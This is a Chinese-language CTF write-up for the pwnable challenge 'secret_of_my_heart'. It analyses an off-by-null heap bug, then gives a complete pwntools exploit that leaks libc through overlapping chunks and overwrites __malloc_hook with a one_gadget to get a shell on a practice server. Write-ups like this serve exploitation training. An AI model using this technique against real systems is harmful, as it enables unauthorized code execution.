pwnable writeup
secret_of_my_heart
保护
checksec.png
IDA 反汇编
从add函数可以看到结构体
struct chunk{
__int64 size;
char name[0x20];
char *desc;
}
然后又全局变量 0x202018 ,每0x30个写入一个chunk结构体,那就是一个chunk结构体数组,chunk *dword_202018
漏洞点 vuln
char *__fastcall vuln(chunk *chunks, __int64 size)
{
char *result; // rax
chunks->size = size;
printf("Name of heart :");
input(chunks->name, 0x20u);
chunks->desc = malloc(size);
if ( !chunks->desc )
{
puts("Allocate Error !");
exit(0);
}
printf("secret of my heart :");
result = &chunks->desc[input(chunks->desc, size)];
*result = 0; // 字节最后加上\x00
return result;
}
最后一个字节off by null漏洞
利用思路
程序存在off by null,可以把下一个chunk->size的低位覆盖为0
泄露libc
造成堆块重叠泄露libc
大致原理如下图
off by null
add(0x28...); #0
add(0x100,"a"*0xf0+p64(0x100)); #1
add(0x100...); #2
free(1)
free(0)
add(0x28,"a"*0x28) #0
这样把chunk1->size=0x100
chunk2->prevsize = 0x100
heap-1
再把chunk分步申请回来
add(0x80,"4"*4,"b"*4) #1
add(0x10,"4"*4,"b"*4) #3
heap-2
按照上面的原理图
free(1)
free(2)
这样我们就可以得到 chunk1 到 chunk2的堆块
heap-3
这样后面分配后chunk会慢慢合并在一起
add(0x80,"1111","g"*0x80) #idx1
add(0x100,"2222","h"*0x68+p64(0x1234)) #idx2
add(0x80,"4444","i"*0x80) #idx4
heap-4
之前的restchunk也被分配过来了,chunk2和chunk3都是同一个chunk
free(2)
show(3)
这样就可以泄露libc
攻击
之后用unsotedbin attack把malloc_hook该one_gadget就行
EXP
from pwn import *
import sys
name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
sh = 0
l64 = lambda :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :sh.sendlineafter(str(a),str(b))
sa = lambda a,b :sh.sendafter(str(a),str(b))
lg = lambda name,data : sh.success(name + ": 0x%x" % data)
se = lambda payload: sh.send(payload)
rl = lambda : sh.recv()
sl = lambda payload: sh.sendline(payload)
ru = lambda a :sh.recvuntil(str(a))
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
def cmd(ch):
sla("Your choice :",ch)
def add(size,name,text):
cmd(1)
sla("Size of heart : ",size)
sa("Name of heart :",name)
sa("secret of my heart :",text)
def show(idx):
cmd(2)
sla("Index :",idx)
def free(idx):
cmd(3)
sla("Index :",idx)
def main(ip,port,debug,mode):
global sh
if debug==0:
context.log_level = "debug"
else:
pass
if mode==0:
sh = process(name)
else:
sh = remote(ip,port)
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
add(0x28,"1"*4,"a"*4)#0
add(0x100,"2"*4,"a"*0xf0+p64(0x100))#1
add(0x100,"3"*4,"a"*4)#2
free(1)
free(0)
add(0x28,"1"*4,"a"*0x28)#1
add(0x80,"4"*4,"b"*4)#2
add(0x10,"4"*4,"b"*4)#3
gdb.attach(sh)
raw_input()
free(1)
free(2)
add(0x80,"1111","g"*0x80) #idx1
add(0x100,"2222","h"*0x68+p64(0x1234)) #idx2
add(0x80,"4444","i"*0x80) #idx4
free(2)
show(3)
libc_base = u64(ru("\x7f")[-6:].ljust(8,"\x00"))-0x3c4b78
malloc_addr = libc_base + libc.sym['__malloc_hook']
one = libc_base + one[2]
lg("malloc_addr" ,malloc_addr)
lg("one gaget ",one )
free(1)
add(0x100, "a"*4,"e"*0x80+p64(0)+p64(0x71))
free(3)
free(1)
add(0x100,"a"*4, "f"*0x80+p64(0)+p64(0x71)+p64(malloc_addr-0x23))
add(0x60,"a"*4, "f")
add(0x60,"a"*4, "\x00"*0x13+p64(one))
free(3)
sh.interactive()
if __name__ == '__main__':
main("node3.buuoj.cn","27295",0,1)